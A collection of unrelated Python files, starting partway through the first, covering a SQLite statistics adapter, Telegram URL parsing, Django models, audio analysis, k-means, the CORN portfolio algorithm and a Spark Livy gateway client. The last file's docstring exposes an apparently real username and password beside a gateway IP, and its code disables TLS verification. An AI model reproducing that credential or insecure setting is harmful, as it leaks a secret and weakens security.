self.identify = identify
self.connection = None
self.resetDB = resetDB
self.resetIdentify = resetIdentify
self.dbName = dbname
self.typeDict = { types.FloatType : "real" }
self.statsGenFreq = frequency
self.cursorPool = None
self.commitFreq = commit_freq
def __repr__(self):
""" The string representation of adapter """
ret = "DBSQLite DB Adapter [File='%s', identify='%s']" % (self.dbName, self.identify)
return ret
def open(self):
""" Open the database connection """
logging.debug("Opening database, dbname=%s", self.dbName)
self.connection = sqlite3.connect(self.dbName)
if self.resetDB:
self.resetStructure(Statistics.Statistics())
if self.resetIdentify:
self.resetTableIdentify()
def commitAndClose(self):
""" Commit changes on database and closes connection """
self.commit()
self.close()
def close(self):
""" Close the database connection """
logging.debug("Closing database.")
if self.cursorPool:
self.cursorPool.close()
self.cursorPool = None
self.connection.close()
def commit(self):
""" Commit changes to database """
logging.debug("Commiting changes to database.")
self.connection.commit()
def getCursor(self):
""" Return a cursor from the pool
:rtype: the cursor
"""
if not self.cursorPool:
logging.debug("Creating new cursor for database...")
self.cursorPool = self.connection.cursor()
return self.cursorPool
else:
return self.cursorPool
def createStructure(self, stats):
""" Create table using the Statistics class structure
:param stats: the statistics object
"""
c = self.getCursor()
pstmt = "create table if not exists %s(identify text, generation integer, " % (Consts.CDefSQLiteDBTable)
for k, v in stats.items():
pstmt += "%s %s, " % (k, self.typeDict[type(v)])
pstmt = pstmt[:-2] + ")"
logging.debug("Creating table %s: %s.", Consts.CDefSQLiteDBTable, pstmt)
c.execute(pstmt)
pstmt = """create table if not exists %s(identify text, generation integer,
individual integer, fitness real, raw real)""" % (Consts.CDefSQLiteDBTablePop)
c.execute(pstmt)
self.commit()
def resetTableIdentify(self):
""" Delete all records on the table with the same Identify """
c = self.getCursor()
stmt = "delete from %s where identify = ?" % (Consts.CDefSQLiteDBTable)
stmt2 = "delete from %s where identify = ?" % (Consts.CDefSQLiteDBTablePop)
try:
c.execute(stmt, (self.identify,))
c.execute(stmt2, (self.identify,))
except sqlite3.OperationalError, expt:
if expt.message.find("no such table") >= 0:
print "\n ## The DB Adapter can't find the tables ! Consider enable the parameter resetDB ! ##\n"
self.commit()
def resetStructure(self, stats):
""" Deletes de current structure and calls createStructure
:param stats: the statistics object
"""
logging.debug("Reseting structure, droping table and creating new empty table.")
c = self.getCursor()
c.execute("drop table if exists %s" % (Consts.CDefSQLiteDBTable,))
c.execute("drop table if exists %s" % (Consts.CDefSQLiteDBTablePop,))
self.commit()
self.createStructure(stats)
def insert(self, stats, population, generation):
""" Inserts the statistics data to database
:param stats: statistics object (:class:`Statistics.Statistics`)
:param population: population to insert stats (:class:`GPopulation.GPopulation`)
:param generation: the generation of the insert
"""
c = self.getCursor()
pstmt = "insert into %s values (?, ?, " % (Consts.CDefSQLiteDBTable)
for i in xrange(len(stats)):
pstmt += "?, "
pstmt = pstmt[:-2] + ")"
c.execute(pstmt, (self.identify, generation) + stats.asTuple())
pstmt = "insert into %s values(?, ?, ?, ?, ?)" % (Consts.CDefSQLiteDBTablePop,)
tups = []
for i in xrange(len(population)):
ind = population[i]
tups.append((self.identify, generation, i, ind.fitness, ind.score))
c.executemany(pstmt, tups)
if (generation % self.commitFreq == 0):
self.commit()
|
# =============================================================================
# Ural Telegram-related heuristic functions
# =============================================================================
#
# Collection of functions related to Telegram urls.
#
import re
from collections import namedtuple
from ural.ensure_protocol import ensure_protocol
from ural.utils import pathsplit, urlsplit, urlunsplit, safe_urlsplit, SplitResult
from ural.patterns import DOMAIN_TEMPLATE
TELEGRAM_MESSAGE_ID_RE = re.compile(r"^\d+$")
TELEGRAM_DOMAINS_RE = re.compile(r"(?:telegram\.(?:org|me)|t\.me)$", re.I)
TELEGRAM_URL_RE = re.compile(
DOMAIN_TEMPLATE % r"(?:[^.]+\.)*(?:telegram\.(?:org|me)|t\.me)", re.I
)
TELEGRAM_PUBLIC_REPLACE_RE = re.compile(
r"^(?:[^.]+\.)?(?:telegram\.(?:org|me)|t\.me)", re.I
)
TelegramMessage = namedtuple("TelegramMessage", ["name", "id"])
TelegramGroup = namedtuple("TelegramGroup", ["id"])
TelegramChannel = namedtuple("TelegramChannel", ["name"])
def is_telegram_message_id(value):
return bool(re.search(TELEGRAM_MESSAGE_ID_RE, value))
def is_telegram_url(url):
"""
Function returning whether the given url is a valid Telegram url.
Args:
url (str): Url to test.
Returns:
bool: Whether given url is from Telegram.
"""
if isinstance(url, SplitResult):
return bool(re.search(TELEGRAM_DOMAINS_RE, url.hostname))
return bool(re.match(TELEGRAM_URL_RE, url))
def convert_telegram_url_to_public(url):
"""
Function parsing the given telegram url and returning the same but the
the public version.
"""
safe_url = ensure_protocol(url)
has_protocol = safe_url == url
scheme, netloc, path, query, fragment = urlsplit(safe_url)
if not is_telegram_url(netloc):
raise TypeError(
"ural.telegram.convert_telegram_url_to_public: %s is not a telegram url"
% url
)
netloc = re.sub(TELEGRAM_PUBLIC_REPLACE_RE, "t.me/s", netloc)
result = (scheme, netloc, path, query, fragment)
result = urlunsplit(result)
if not has_protocol:
result = result.split("://", 1)[-1]
return result
def parse_telegram_url(url):
"""
Function parsing the given url and returning either a TelegramMessage,
TelegramChannel, TelegramGroup or None if nothing of information could be
found.
Args:
url (str): Url to parse.
"""
if not is_telegram_url(url):
return None
parsed = safe_urlsplit(url)
path = pathsplit(parsed.path)
if path:
if path[0] == "s":
if path[1] == "joinchat":
if len(path) == 3:
return TelegramGroup(id=path[2])
else:
return None
elif len(path) == 3 and is_telegram_message_id(path[2]):
return TelegramMessage(name=path[1], id=path[2])
elif len(path) == 2:
return TelegramChannel(name=path[1])
return None
else:
if path[0] == "joinchat":
if len(path) == 3:
return TelegramGroup(id=path[2])
elif len(path) == 2:
return TelegramGroup(id=path[1])
else:
return None
elif len(path) == 2 and is_telegram_message_id(path[1]):
return TelegramMessage(name=path[0], id=path[1])
elif len(path) == 1:
return TelegramChannel(name=path[0])
return None
def extract_channel_name_from_telegram_url(url):
parsed = parse_telegram_url(url)
if parsed is None or isinstance(parsed, TelegramGroup):
return
return parsed.name
|
def get_left(index):
return (2 * index) + 1
def get_right(index):
return (2 * index) + 2
def min_heapify(arr, index):
left = get_left(index)
right = get_right(index)
if left < len(arr) and arr[left] < arr[index]:
smallest = left
else:
smallest = index
if right < len(arr) and arr[right] < arr[smallest]:
smallest = right
if smallest != index:
arr[index], arr[smallest] = arr[smallest], arr[index]
min_heapify(arr, smallest)
def build_min_heap(arr):
n = int((len(arr) // 2) - 1)
for index in range(n, -1, -1):
min_heapify(arr, index)
def heap_extract_min(A):
if len(A) < 1:
return A
min_value = A[0]
A[0] = A[-1]
min_heapify(A, 0)
return min_value
if __name__ == '__main__':
a = [3, 9, 2, 1, 4, 5]
build_min_heap(a)
print(a)
|
# Generated by Django 3.1.6 on 2021-08-19 10:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('firstApp', '0016_rooms_room_id'),
]
operations = [
migrations.AddField(
model_name='rooms',
name='slug',
field=models.SlugField(null=True),
),
migrations.AlterField(
model_name='rooms',
name='room_id',
field=models.CharField(default='HM0UEE', max_length=6),
),
]
|
import numpy as np
randn = np.random.randn
import pandas as pd
from bs4 import BeautifulSoup
from urllib2 import urlopen
from pandas.io.parsers import TextParser
import pandas.io.parsers as pdp
from pandas.io.data import DataReader
f = lambda x: str(x)
remove_w = lambda x: x.strip()
buf = urlopen('http://www.tradingeconomics.com/calendar?g=world')
soup = BeautifulSoup(buf)
body = soup.body
tables = body.findAll('table')
# for i in tables:print 'i.attrs'
calls = tables[1]
# for property, value in vars(calls).iteritems():
# print property, ": ", value
# print '----------'
# print calls.attrs
rows = calls.findAll('tr')
def _unpack(row, kind='td'):
return [val.text for val in row.findAll(kind)]
def parse_options_data(table):
rows = table.findAll('tr')
header = _unpack(rows[0], kind='th')
data = [_unpack(r) for r in rows[1:]]
L1=[]
for i in data:
if len(i)>4:
L1.append(i)
# if len(i)==6:
# L1.append(i[1:])
# else:
# L1.append(i)
for i in range(0,len(L1)):
for ii in range(0,len(L1[i])):
oo=L1[i][ii].strip()
L1[i][ii]=oo
res=TextParser(L1, names=header).get_chunk()
res=res.applymap(f)
#not if downloading is
# res.index=res[0]
# res= res.reindex(columns=res.columns[1:])
# res=res.T
#------------------------------------
return res
call_data = parse_options_data(calls)
print call_data.head(200).to_string()
call_data.to_csv("C:\Users\oskar\Documents\doc_no_backup\python_crap\excel\deol.csv") |
from typing import Optional
import librosa
from librosa import display
import matplotlib.pyplot as plt
import numpy as np
import scipy
from librosa.display import specshow
from scipy.fftpack import fft, fftfreq
from scipy.io import wavfile
from sympy.stats.drv_types import scipy
class SpectraAnalysis:
iterator = 1
debug = True
def spectra(self, name_of_audio_file):
samples, sampleRate = librosa.load(name_of_audio_file, sr=None, mono=True, offset=0.0,
duration=None)
if self.debug:
plt.figure()
librosa.display.waveplot(y=samples, sr=sampleRate)
plt.xlabel("Time (Seconds)")
plt.ylabel("Amplitude")
plt.tight_layout()
plt.show()
def fastFourierTransform(self, data, sampleRate):
sampleLength = len(data)
time = 1 / sampleRate
yAxis = scipy.fft(data)
xAxis = np.linspace(0.0, 1.0 / (2.0 * time), sampleLength // 2)
if self.debug:
figure, graph = plt.subplots()
graph.plot(xAxis, 2.0 / sampleLength * np.abs(yAxis[:sampleLength // 2]))
plt.grid()
plt.xlabel("Frequency (Hz)")
plt.ylabel("Magnitude")
plt.show()
def spectrogram(self, samples, sample_rate, stride_ms=10.0,
window_ms=20.0, max_freq=22050, eps=1e-14):
stride_size = int(0.001 * sample_rate * stride_ms)
window_size = int(0.001 * sample_rate * window_ms)
# Extract strided windows
truncate_size = (len(samples) - window_size) % stride_size
samples = samples[:len(samples) - truncate_size]
nshape = (window_size, (len(samples) - window_size) // stride_size + 1)
nstrides = (samples.strides[0], samples.strides[0] * stride_size)
windows = np.lib.stride_tricks.as_strided(samples,
shape=nshape, strides=nstrides)
assert np.all(windows[:, 1] == samples[stride_size:(stride_size + window_size)])
# Window weighting, squared Fast Fourier Transform (fft), scaling
weighting = np.hanning(window_size)[:, None]
fft = np.fft.rfft(windows * weighting, axis=0)
fft = np.absolute(fft)
fft = fft ** 2
scale = np.sum(weighting ** 2) * sample_rate
fft[1:-1, :] *= (2.0 / scale)
fft[(0, -1), :] /= scale
# Prepare fft frequency list
freqs = float(sample_rate) / window_size * np.arange(fft.shape[0])
# Compute spectrogram feature
ind = np.where(freqs <= max_freq)[0][-1] + 1
spectrogram = np.log(fft[:ind, :] + eps)
if self.debug:
specshow(spectrogram, x_axis="time", y_axis="hz")
def meanFrequency(self, data: np.ndarray, samplingFrequency: int) -> float:
spec = np.abs(np.fft.rfft(data))
frequency = np.fft.rfftfreq(len(data), d=1 / samplingFrequency)
amplitude = spec / spec.sum()
meanFrequency = (frequency * amplitude).sum()
return meanFrequency
|
#!/bin/python
import sys
example_one = 15
expected = 4
def find_count(input_int):
byte_count = sys.getsizeof(input_int)
bit_count = byte_count * 8
one_count = 0
for i in range(bit_count):
if (input_int & 1) == 1:
one_count += 1
input_int = input_int >> 1
return one_count
def find_count_while(input_int):
one_count = 0
while input_int > 0:
if (input_int & 1) == 1:
one_count += 1
input_int = input_int >> 1
return one_count
def find_count_division(input_int):
one_count = 0
while input_int > 0:
if (input_int % 2) == 1:
one_count += 1
input_int = input_int / 2;
return one_count
returned = find_count(example_one)
assert expected == returned
returned = find_count_while(example_one)
assert expected == returned
returned = find_count_division(example_one)
assert expected == returned
print 'W00T we passed.'
|
from django.db import models
class Approach(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=30)
description = models.CharField(max_length=500)
score = models.FloatField()
def __str__(self):
return '[ID: %d, Approach: %s, Score: %f]' % (self.id, self.name, self.score)
class Tool(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=30)
description = models.CharField(max_length=500)
score = models.FloatField()
approach = models.ForeignKey(Approach, on_delete=models.CASCADE)
def __str__(self):
return '[ID: %d, Tool: %s, Score: %f, Approach: %s]' % (self.id, self.name, self.score, self.approach)
class Scale_Choice(models.Model):
id = models.AutoField(primary_key=True)
#----------
TOTALLY_AGREE = 5
AGREE = 4
NEITHER_AGREE_NOR_DISAGREE = 3
DISAGREE = 2
TOTALLY_DISAGREE = 1
SCALE_CHOICES = (
(TOTALLY_AGREE, 'Totally Agree'),
(AGREE, 'Agree'),
(NEITHER_AGREE_NOR_DISAGREE, 'Neither agree nor disagree'),
(DISAGREE, 'Disagree'),
(TOTALLY_DISAGREE, 'Totally disagree'),
)
scale_choice_txt = models.CharField(max_length=30, default='null')
scale_choice_value = models.PositiveIntegerField(
choices = SCALE_CHOICES,
default = TOTALLY_AGREE,
)
def __str__(self):
return '[Choice: %s, Value: %d]' % (self.scale_choice_txt, self.scale_choice_value)
class Dicotomic_Choice(models.Model):
id = models.AutoField(primary_key=True)
#----------
YES = 5
NO = 1
DICOTOMIC_CHOICES = (
(YES, 'Yes'),
(NO, 'No'),
)
dicotomic_choice_txt = models.CharField(max_length=5, default='null')
dicotomic_choice_value = models.PositiveIntegerField(
choices = DICOTOMIC_CHOICES,
default = YES,
)
def __str__(self):
return '[Choice: %s, Value: %d]' % (self.dicotomic_choice_txt, self.dicotomic_choice_value)
class Question(models.Model):
id = models.AutoField(primary_key=True)
question_text = models.CharField(max_length=200)
tool = models.ForeignKey(Tool,
null=True,
blank=True,
on_delete=models.CASCADE)
approach = models.ForeignKey(Approach,
null=True,
blank=True,
on_delete=models.CASCADE
)
#-----
SCALE = 'scale'
DICOTOMIC = 'dicotomic'
type_choices = (
(SCALE, 'Scale'),
(DICOTOMIC, 'Dicotomic')
)
type = models.CharField(
max_length=30,
choices=type_choices,
default=SCALE
)
def __str__(self):
return '[ID: %d, Question: %s, Type: %s, Approach: %s, Tool: %s]' % (self.id, self.question_text, self.type, self.approach, self.tool)
|
print("Your function is 8n^2+3n+3")
print ("g(n) = n^2 ")
print("Assuming c as 9")
n=0
for i in range (30):
a1 = 8*(i**2)+3*i+3
a2 = 10*(i**2)
if (a2>=a1):
n=i
break
print("Value of n0: ",n)
print ("Value\t\tF(n)\t\tc*G(n)")
for i in range (10,31):
print (i,"\t\t",8*(i**2)+3*i+3,"\t\t",9*(i**2)) |
import numpy as np
import time
from scipy.cluster.vq import kmeans
nr_total_centers = 200
feature_dimension = 250
def mapper(key, value):
# key: None
# value: one line of input file
yield "key", value
def reducer(key, values):
# key: key from mapper used to aggregate
# values: list of all value for that key
# Note that we do *not* output a (key, value) pair here.
start = time.time()
np.random.shuffle(values)
# number of images
k = values.shape[0]
# array containing 200 centers for initialization of the result (random)
result = np.zeros((nr_total_centers,feature_dimension))
# pick the first center as mean of datapoints
result[0,:] = np.sum(values,axis=0) / k
# D holds the distances from datapoints to closest center
D = np.zeros(k)
# psi is the sum of distances from the centers (sum of values in D)
psi = 0
# counting acquired centers
r = 1
# oversampling factor and nr of iterations (we get about l*n centers)
n = 7
l = 30
# start k-means|| (initialization)
start_barbar = time.time()
for i in range(n):
for j in range(k):
# go through the dataset
c = np.inf
# find distance of closest center
for m in range(r):
dist = np.linalg.norm(result[m,:] - values[j,:])
if dist < c:
c = dist
# store closest distance squared
D[j] = c**2
psi = np.sum(D)
# go through the dataset again to sample new centers
for p in range(k):
# random value between 0 and 1
ind = np.random.random_sample()
# if probability (l*D[p]/psi) is high enough, sample as center
if ind <= l*D[p]/psi:
result[r,:] = values[p,:]
r += 1
if r == nr_total_centers:
break
if r == nr_total_centers:
break
end_barbar = time.time()
print("Initialization done. Time: " + str((end_barbar-start_barbar)/60.0))
# do kmeans from scipy with initial centers
final_result = kmeans(values,result)
# begin online k-means
# t = 1.0
# # loop over all images and do online k-means
# for i in range(k):
# # get the next image
# temp = values[i,:]
# # initialize parameters (min distance and that index)
# c = np.inf
# min_index = 0
# # find index of center which is closest to image
# for j in range(nr_total_centers):
# dist = np.linalg.norm(result[j,:] - temp)
# if dist < c:
# c = dist
# min_index = j
# # weigh higher distances more than lower ones
# if c > 10 and i < k*l-6000:
# stepsize = 0.9
# elif c == 0:
# continue
# else:
# stepsize = 1.0 / t
# result[min_index,:] += stepsize*(temp - result[min_index,:])
# t += 0.003
end = time.time()
print("Reducer time: " + str((end-start)/60.0))
yield final_result[0]
|
from rest_framework.serializers import ModelSerializer, raise_errors_on_nested_writes
from django.contrib.auth.models import User
from app.api.employee.serializers import Employee_listSerializer
from app.model import Attendance
from rest_framework import serializers
class AttandanceSerialzier(ModelSerializer):
# employee_id = Employee_listSerializer(read_only=True)
# employee_id_id = serializers.IntegerField(write_only=True)
class Meta:
model = Attendance
fields = ()
# def update(self, instance, validated_data):
# if instance.
|
import requests
import subprocess
import time, sys
print("Welcome to Distributed Nano Proof of Work System")
address = input("Please enter your payout address: ")
print("All payouts will go to %s" % address)
pow_source = int(input("Select PoW Source, 0 = local, 1 = node: "))
if pow_source > 1:
print("Incorrect Entry, Exiting")
sys.exit()
print("Waiting for work...")
while 1:
try:
r = requests.get('http://178.62.11.37/request_work')
hash_result = r.json()
if hash_result['hash'] != "error":
if pow_source == 0:
try:
result = subprocess.check_output(["./mpow", hash_result['hash']])
work = result.decode().rstrip('\n\r')
print(work)
except:
print("Error - no mpow binary")
sys.exit()
elif pow_source == 1:
try:
rai_node_address = 'http://%s:%s' % ('127.0.0.1', '7076')
get_work = '{ "action" : "work_generate", "hash" : "%s", "use_peers": "true" }' % hash_result['hash']
r = requests.post(rai_node_address, data = get_work)
resulting_work = r.json()
work = resulting_work['work'].lower()
except:
print("Error - failed to connect to node")
sys.exit()
json_request = '{"hash" : "%s", "work" : "%s", "address" : "%s"}' % (hash_result['hash'], work, address)
r = requests.post('http://178.62.11.37/return_work', data = json_request)
print(r.text)
time.sleep(20)
except:
print("Error")
|
#!/usr/bin/env python3
"""Check that all exported symbols are specified in the symbol version scripts.
If this fails, please update the appropriate .map file (adding new version
nodes as needed).
"""
import os
import pathlib
import re
import sys
top_srcdir = pathlib.Path(os.environ['top_srcdir'])
def symbols_from_map(path):
return re.findall(r'^\s+(xkb_.*);', path.read_text('utf-8'), re.MULTILINE)
def symbols_from_src(path):
return re.findall(r'XKB_EXPORT.*\n(xkb_.*)\(', path.read_text('utf-8'))
def diff(map_path, src_paths):
map_symbols = set(symbols_from_map(map_path))
src_symbols = set.union(set(), *(symbols_from_src(path) for path in src_paths))
return sorted(map_symbols - src_symbols), sorted(src_symbols - map_symbols)
exit = 0
# xkbcommon symbols
left, right = diff(
top_srcdir/'xkbcommon.map',
[
*(top_srcdir/'src').glob('*.c'),
*(top_srcdir/'src'/'xkbcomp').glob('*.c'),
*(top_srcdir/'src'/'compose').glob('*.c'),
],
)
if left:
print('xkbcommon map has extra symbols:', ' '.join(left))
exit = 1
if right:
print('xkbcommon src has extra symbols:', ' '.join(right))
exit = 1
# xkbcommon-x11 symbols
left, right = diff(
top_srcdir/'xkbcommon-x11.map',
[
*(top_srcdir/'src'/'x11').glob('*.c'),
],
)
if left:
print('xkbcommon-x11 map has extra symbols:', ' '.join(left))
exit = 1
if right:
print('xkbcommon-x11 src has extra symbols:', ' '.join(right))
exit = 1
sys.exit(exit)
|
# Generated by Django 3.1.1 on 2020-11-05 16:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('GoodData', '0052_auto_20201102_1732'),
]
operations = [
migrations.CreateModel(
name='app_version',
fields=[
('app_version_id', models.AutoField(primary_key=True, serialize=False)),
('type', models.CharField(max_length=100)),
('version', models.CharField(max_length=100)),
],
),
]
|
#!/home/kevinr/src/750book-web-project/750book-web-env/bin/python2.7
# EASY-INSTALL-ENTRY-SCRIPT: 'celery==2.5.1','console_scripts','camqadm'
__requires__ = 'celery==2.5.1'
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.exit(
load_entry_point('celery==2.5.1', 'console_scripts', 'camqadm')()
)
|
#!/usr/bin/env python
import re
import sys
import DNS
if len(sys.argv) == 1 or sys.argv[1] == "-h":
print 'Get last status of someone on twitter'
print "Usage: %s sizeof" % sys.argv[0]
sys.exit(0)
try:
username = re.search('[a-zA-Z0-9*.]*', sys.argv[1]).group(0)
DNS.DiscoverNameServers();
r = DNS.Request('%s.twitter.any.io' % username, qtype='txt');
ans = r.req()
print ans.answers[0]['data'][0]
except Exception as ex:
print "Humph, I can't find this twitter user ..."
|
# --utf-8--
import unittest
from comment import context
from comment.request_util import Request
from ddt import ddt, data
from datetime import datetime
from testrun import de
from comment.log import get_logger
from comment.every_path import conf_path
from comment.readini import Readini
time = datetime.now().strftime('%Y/%m/%d/%H:%M:%S')
# host = "http://120.24.33.253:8080/futureloan/mvc/api/"
cases = de.ReadExcel('充值')
request = Request()
readini=Readini(conf_path)
host=readini.readini("conf","host")
@ddt
class Testlogin(unittest.TestCase):
# 该类为注册测试用例,通过ddt解包,传入用例
logger = get_logger("接口测试")
@data(*cases)
def testlogin(self, case):
new_case = context.content(case)
try:
# url,method,data=None,content_type=None
result = request.sendrequest(host + new_case['url'], new_case['method'], new_case['data'])
self.assertEqual(result['code'], str(new_case['assert']))
self.logger.info("用例标题:%s 执行通过,%s"%(new_case['title'],result['msg']))
# print(result)
de.Write("充值",new_case["id"]+1,None,"Pass",time)
except Exception as e:
self.logger.debug("用例标题:%s 执行失败"%new_case['title'])
de.Write("充值",new_case["id"]+1,e,"Pass",time)
raise e
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Andrea Masi 2014 eraclitux@gmail.com
import unittest
import mock
import requests
from ipcampy.common import CamException
from ipcampy.foscam import FosCam, map_position
class TestFosCam(unittest.TestCase):
def test_map_position_1(self):
self.assertEqual(map_position(1), 31)
def test_map_position_16(self):
self.assertEqual(map_position(16), 61)
@mock.patch('ipcampy.foscam.requests')
def test_move_no_password(self, mock_requests):
r = requests.Response()
r.status_code = 401
mock_requests.get.return_value = r
f = FosCam("localhost")
with self.assertRaisesRegexp(CamException, "Unauthorized"):
f.move(1)
@mock.patch('ipcampy.foscam.requests')
def test_move_wrong_pos(self, mock_requests):
r = requests.Response()
r.status_code = 401
mock_requests.get.return_value = r
f = FosCam("localhost")
with self.assertRaisesRegexp(CamException, "Position"):
f.move(18)
if __name__ == '__main__':
unittest.main()
|
from base_command import base_command
import time
command_info = {
'id' : 'echo' ,
'rules' : [ '?(please) start echoing ?(me)' ] ,
'vars' : None
}
class command(base_command) :
def __init__(self,opts) :
# pass on the opts to the base class
super().__init__(opts)
# the main run function for the command
def run(self) :
self.log.i("Running")
self.emit("OK")
while True :
# wait for next message
# can write blocking code b/c will be run inside thread
text = self.get_input()
# - for getting get chunk
# text = self.call_command({'args' : {} , 'command_info' : { 'id' : 'get_text_chunk' ,
# 'module' : 'builtins'}})
#text =self.get_input()
self.log.i("Received msg: {}".format(text))
if text == "finished" :
self.emit("EXITING")
break
else :
self.emit("You said: {}".format(text))
time.sleep(5)
# at this point we are done
self.finish("DONE")
|
# Copyright 2017, DELLEMC, Inc.
"""
Module to abstract NPM operation
"""
import json
import sys
import os
try:
import common
except ImportError as import_err:
print import_err
sys.exit(1)
class NPM(object):
"""
A module of NPM
"""
def __init__(self, registry, token):
self._registry = registry
self._token = token
self.authenticate()
def authenticate(self):
'''
Authenticate the npm registry with token
'''
try:
home = os.path.expanduser("~")
user_config = os.path.join(home,".npmrc")
f = open(user_config, 'w+')
text = "//{registry}/:_authToken={token}"\
.format(registry=self._registry, token=self._token)
f.write(text)
f.close()
cmd_args = ['npm', 'whoami']
common.run_command(cmd_args)
except Exception, e:
raise ValueError("Failed to authenticate with {registry} due to {error}"\
.format(registry=self._registry, error=e))
@staticmethod
def update_version(package_dir, version=None):
'''
update version of package
'''
try:
cmd_args = ["npm", "version", "--no-git-tag-version"]
if version is not None:
cmd_args.append(version)
common.run_command(cmd_args, directory=package_dir)
except Exception, e:
raise ValueError("Failed to update version of package {package} due to {error}"\
.format(package=package_dir, error=e))
def publish_package(self, package_dir, tag=None):
'''
publish package to npm registry with tag
'''
try:
cmd_args = ["npm", "publish"]
if tag is not None:
cmd_args += ["--tag", tag]
common.run_command(cmd_args, directory=package_dir)
except Exception, e:
raise ValueError("Failed to publish package {package} due to {error}"\
.format(package=package_dir, error=e))
|
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
query = demisto.args()['query']
rows = demisto.args()['rows']
headers = ""
query = query + ' | head ' + rows
res = demisto.executeCommand('splunk-search', {'using-brand': 'splunkpy', 'query': query})
contents = res[0]['Contents']
if isError(res[0]):
return_error("Error occured. " + str(contents))
if (res and len(res) > 0 and contents):
if not isinstance(contents[0], dict):
headers = "results"
demisto.results({"Type": 1, "Contents": contents, "ContentsFormat": "json", "EntryContext": {},
"HumanReadable": tableToMarkdown("Splunk Search results for: " + query, contents, headers)})
else:
demisto.results('No results.')
|
import numpy as np
def aux(x):
pol = np.poly1d([-20, 70, -84, 35, 0, 0, 0, 0])
y = pol(x) * (x>=0) * (x<=1) #+ (x>1);
return y
def mother(x):
x = np.abs(x)
int1 = (x > np.pi/4) & (x <= np.pi/2);
int2 = (x > np.pi/2) & (x <= np.pi);
y = int1 * np.sin(np.pi/2*aux(4*x/np.pi-1)) #* np.exp(1j*4/3*x);
y = y + int2 * np.cos(np.pi/2*aux(2*x/np.pi-1)) #* np.exp(1j*4/3*x);
return y
def scaling(x):
x = np.abs(x)
int1 = x < np.pi/4
int2 = (x > np.pi/4) & (x < np.pi/2)
y = int1 * np.ones(len(x)) + int2 * np.cos(np.pi/2 * aux(4*x/np.pi-1))
return y
|
from ..algo import Algo
from .. import tools
import numpy as np
import pandas as pd
from numpy import matrix
from cvxopt import solvers, matrix
solvers.options['show_progress'] = False
class CORN(Algo):
"""
Correlation-driven nonparametric learning approach. Similar to anticor but instead
of distance of return vectors they use correlation.
In appendix of the article, universal property is proven.
Two versions are available. Fast which provides around 2x speedup, but uses more memory
(linear in window) and slow version which is memory efficient. Most efficient would
be to rewrite it in sweave or numba.
Reference:
B. Li, S. C. H. Hoi, and V. Gopalkrishnan.
Corn: correlation-driven nonparametric learning approach for portfolio selection, 2011.
http://www.cais.ntu.edu.sg/~chhoi/paper_pdf/TIST-CORN.pdf
"""
PRICE_TYPE = 'ratio'
REPLACE_MISSING = True
def __init__(self, window=5, rho=0.1, fast_version=True):
"""
:param window: Window parameter.
:param rho: Correlation coefficient threshold. Recommended is 0.
:param fast_version: If true, use fast version which provides around 2x speedup, but uses
more memory.
"""
# input check
if not(-1 <= rho <= 1):
raise ValueError('rho must be between -1 and 1')
if not(window >= 2):
raise ValueError('window must be greater than 2')
super(CORN, self).__init__()
self.window = window
self.rho = rho
self.fast_version = fast_version
# assign step method dynamically
self.step = self.step_fast if self.fast_version else self.step_slow
def init_weights(self, m):
return np.ones(m) / m
def init_step(self, X):
if self.fast_version:
# redefine index to enumerate
X.index = range(len(X))
foo = [X.shift(i) for i in range(self.window)]
self.X_flat = pd.concat(foo, axis=1)
self.X = X
self.t = -1
def step_slow(self, x, last_b, history):
if len(history) <= self.window:
return last_b
else:
# init
window = self.window
indices = []
m = len(x)
# calculate correlation with predecesors
X_t = history.iloc[-window:].values.flatten()
for i in range(window, len(history)):
X_i = history.ix[i-window:i-1].values.flatten()
if np.corrcoef(X_t, X_i)[0,1] >= self.rho:
indices.append(i)
# calculate optimal portfolio
C = history.ix[indices, :]
if C.shape[0] == 0:
b = np.ones(m) / float(m)
else:
b = self.optimal_weights(C)
return b
def step_fast(self, x, last_b):
# iterate time
self.t += 1
if self.t < self.window:
return last_b
else:
# init
window = self.window
m = len(x)
X_t = self.X_flat.ix[self.t]
X_i = self.X_flat.iloc[window-1 : self.t]
c = X_i.apply(lambda r: np.corrcoef(r.values, X_t.values)[0,1], axis=1)
C = self.X.ix[c.index[c >= self.rho] + 1]
if C.shape[0] == 0:
b = np.ones(m) / float(m)
else:
b = self.optimal_weights(C)
return b
def optimal_weights(self, X):
X = np.mat(X)
n,m = X.shape
P = 2 * matrix(X.T * X)
q = -3 * matrix(np.ones((1,n)) * X).T
G = matrix(-np.eye(m))
h = matrix(np.zeros(m))
A = matrix(np.ones(m)).T
b = matrix(1.)
sol = solvers.qp(P, q, G, h, A, b)
return np.squeeze(sol['x'])
# use case
if __name__ == '__main__':
tools.quickrun(CORN())
|
#!/usr/bin/python
# coding: utf-8
# Copyright 2018 AstroLab Software
# Author: Chris Arnault
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
curl -i -k -u toto:tata -X POST --data '{"kind": "pyspark"}' -H 'Content-Type: application/json' https://134.158.75.56:8443/gateway/sandbox/livy/v1/sessions
curl -i -k -u christian.arnault:@@@DTsa57 -X GET --data '{"kind": "pyspark"}' -H 'Content-Type: application/json' https://134.158.75.109:8443/gateway/knox_spark/livy/v1/version
"""
import netrc
import base64
import os
import requests
import json
os.environ['HOME'] = 'c:/arnault'
def main():
print('auth')
gateway_name = "gateway_spark"
host = "134.158.75.109"
port = 8443
gateway = "gateway/knox_spark"
secrets = netrc.netrc()
login, username, password = secrets.authenticators(gateway_name)
"""
a = '{}:{}'.format(login, password).encode('utf-8')
a = base64.b64encode(a)
auth = u'Basic {}'.format(a)
print(auth)
### 'Authorization': auth
"""
# , 'Authorization': auth
headers = {'Content-Type': 'application/json'}
data = {"kind": "pyspark"}
url = 'https://{}:{}/{}/livy/v1/version'.format(host, port, gateway)
r = requests.get(url, auth=(login, password), headers=headers, data=json.dumps(data), verify=False)
print(r.json())
